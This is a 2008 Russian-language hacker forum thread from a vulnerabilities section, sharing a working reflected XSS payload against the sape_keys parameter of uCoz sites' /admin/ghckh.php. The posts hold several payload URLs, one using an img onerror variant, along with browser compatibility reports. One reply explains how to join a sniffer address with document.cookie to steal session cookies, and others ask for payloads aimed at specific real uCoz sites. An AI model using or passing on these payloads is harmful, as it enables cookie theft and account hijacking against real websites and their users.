Ucoz xss

Discussion in 'Уязвимости' started by foopi, 28 Dec 2008.

  1. foopi

    foopi Member

    Joined:
    26 Oct 2008
    Messages:
    41
    Likes Received:
    20
    Reputations:
    5
    Вот xss найденная мною на юкозе:
    Code:
    [site.ucoz.ru]/admin/ghckh.php?sape_keys=%22%3E%3Cimg%20src=javascript:alert()%3E
    Пример:
    Code:
    http://cat.ucoz.ru/admin/ghckh.php?sape_keys=%22%3E%3Cimg%20src=javascript:alert()%3E
     
    14 people like this.
  2. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Ыыыыыыы))))
    Юкоз пахекали=)))
    Code:
    http://www.ucoz.ru/admin/ghckh.php?sape_keys=%22%3E%3Cimg%20src=javascript:alert()%3E
    :D:D:D
    Малаца, держи канфетко=)
     
  3. foopi

    foopi Member

    Joined:
    26 Oct 2008
    Messages:
    41
    Likes Received:
    20
    Reputations:
    5
    неправда всё работает)
     
  4. DVD_RW

    DVD_RW Banned

    Joined:
    27 Apr 2008
    Messages:
    0
    Likes Received:
    202
    Reputations:
    -36
    В ФФ не пашет
     
  5. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    В Опере все гуд!
     
  6. k0lbasa

    k0lbasa Elder - Старейшина

    Joined:
    25 May 2008
    Messages:
    189
    Likes Received:
    131
    Reputations:
    -9
    пробел надеюсь не забыл убрать, двдрв?)
     
    1 person likes this.
  7. DVD_RW

    DVD_RW Banned

    Joined:
    27 Apr 2008
    Messages:
    0
    Likes Received:
    202
    Reputations:
    -36
    ога..под ие6 пашет...под фф не хочет ^_^
     
  8. m0sk

    m0sk Member

    Joined:
    27 Oct 2008
    Messages:
    28
    Likes Received:
    7
    Reputations:
    -4
    гут
     
  9. Xcontrol212

    Xcontrol212 Elder - Старейшина

    Joined:
    13 Feb 2008
    Messages:
    253
    Likes Received:
    110
    Reputations:
    7
    ff не пашет,на ие 5 и опера 9.62 пашет!
     
  10. none222

    none222 Guest

    Reputations:
    0
    .................../>  フ.....................
         |  _  _|
         /`ミ _x 彡
         /      |
        /  ヽ   ノ
     / ̄|   | | |
     | ( ̄ヽ__ヽ_)_)
     \二つ
     
    #10 none222, 29 Dec 2008
    Last edited by a moderator: 6 Nov 2020
  11. Sasuke-kun

    Sasuke-kun New Member

    Joined:
    9 Jul 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Уже не пашет =(
     
  12. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Sasuke-kun, че у тебя не пашет???)
    Все там пашет!!!111адинадинадин
    Пробелы убери прост :D:D:D
     
  13. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    99
    Likes Received:
    22
    Reputations:
    -5
    дайте пример на сайт prostota.ucoz.org, уж очень хочется посмотреть, а то смотрю и не пашет(
     
  14. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    99
    Likes Received:
    22
    Reputations:
    -5
    всё, понял, а как с ней увести пароль как то можно? снифером трудно будет
     
  15. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Пробуй так:
    alert(адрес снифера+document.cookie)
     
  16. Chrome~

    Chrome~ Elder - Старейшина

    Joined:
    13 Dec 2008
    Messages:
    936
    Likes Received:
    162
    Reputations:
    27
    Реально. Автору зачет.
     
  17. Sasuke-kun

    Sasuke-kun New Member

    Joined:
    9 Jul 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    хм..а у меня не пашет,можите дать готовый пример например к сайту naruto-fan.ru он на ucoz'е
     
  18. Chrome~

    Chrome~ Elder - Старейшина

    Joined:
    13 Dec 2008
    Messages:
    936
    Likes Received:
    162
    Reputations:
    27
    Для Mozilla Firefox, Opera и некоторых других браузеров успешно работает такая конструкция:

    Code:
    http://cat.ucoz.ru/admin/ghckh.php?sape_keys="><img src="a"onerror=alert("XSS")>
     
    #18 Chrome~, 29 Dec 2008
    Last edited: 29 Dec 2008
  19. Alexandr II

    Alexandr II -=ImperatoR=-

    Joined:
    28 Dec 2007
    Messages:
    1,067
    Likes Received:
    670
    Reputations:
    87
    всё пашет и пашет нормально ;) заслужил +
     
  20. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    617
    Likes Received:
    290
    Reputations:
    1
    уже прикрыли ?(